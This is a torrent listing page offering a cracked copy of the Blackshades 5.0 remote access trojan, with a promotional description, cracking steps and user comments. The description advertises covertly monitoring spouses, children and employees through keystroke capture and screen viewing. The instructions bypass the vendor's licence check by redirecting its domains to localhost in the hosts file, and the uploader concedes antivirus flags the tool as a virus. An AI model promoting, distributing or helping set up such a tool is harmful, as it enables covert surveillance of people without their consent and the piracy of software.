Blackshades 5.0 cracked

seeders: 20
leechers: 0
Added on August 13, 2013 by raingirl91in Applications > Windows
Torrent verified.

Blackshades 5.0 cracked (Size: 19.72 MB)
 Blackshades 5.0 cracked.zip19.72 MB

Description

Blackshades 5.0 cracked

A comprehensive software! Wise enough to teach an absolute beginner and powerful enough to manage and master any computer at distance.
The Blackshades Team has long been known as "brains behind the best-selling brand in the remote tech section".

Need to help out a customer who is having trouble setting up a piece of software?

Have you ever questioned what your spouse, kids or employees have been doing on the computer?
Is your child misusing the Internet facility and taking secret chat with the stranger? Are your employees mailing your business data to your competitors?

Blackshades Remote Controller will enable you to control the client's PC as if you were sitting right in front of it, with support for mouse and keyboard input!
You can also chat with the client while you do so.
Got a Network to manage? With Blackshades Remote Controller you can connect to unlimited systems, and administer them collectively or individually.

You can transfer files and folders between systems, view all the screens of the systems simultaneously and perform maintenance actions.
Send a message to all of them with one click, chat with the systems, run commands via the remote command prompt...there's a huge range of functions suited for network management.

Blackshades Remote Controller also provides as an efficient way of turning your machine into a surveillance/spy-device or to spy on a specific system.
If you want to monitor all keystrokes on your computer while you are away, or want to make sure your child is being safe while using the computer, the built in tools such as the keystroke capturer, screen viewer and process manager will aid you to do so.

This tool has no dependencies (.NET Framework, java, etc) and works extremely well and stable.
Blackshades Remote Controller will let you remotely control your machines, while giving you complete peace of mind.
Using this tool will allow you to do anything between controlling software and hardware.

Blackshades 5 Cracked Instructions:
-----------------------------------
Use Notepad (run as admin) and add the following to “host file”( C:WindowsSystem32driversetc):

127.0.0.1 blackshades.eu
127.0.01 bshades.eu
127.0.0.1 bshades.ru
127.0.0.1 blackshades.ru

Save as “all file”, not text.

If you are having problems adding to the host file try googling “how to add to host file”.
I’m sure someone out there has done a much better job explaining it.

Start the logon server (in lsrv folder).
Start the Client.
That is it. The program should run fine.

Read the included PDF files on setup and user guide options.
This program is ONLY to be used on computers that you have the consent of the owner.
If the file is incomplete or missing it is probably being deleted by your antivirus.
Almost ALL antivirus software considers this a virus because it is a RAT (remote administration tool).
If you don’t know what a RAT is, Google it, or better yet, don’t download it.
Please don’t complain about this being backdoored (because it isn’t) or being a virus (because it kind of is).
It’s a RAT! A good one.

Sharing Widget

Download torrent
19.72 MB
seeders:20
leechers:0
Blackshades 5.0 cracked

All Comments

Thanks!! I've been looking for this for a while. None the other ones I came across worked. This one works like a charm.
At first I didn't change the Host File and the program didn't work. I then read the instructions and set it up as told. Works perfect. Thank you!
I'm glad you got it working. Adding the Host File info is the "crack" or "work around". The software connects to you (127.0.0.1) but thinks its connecting to the Blackshades server.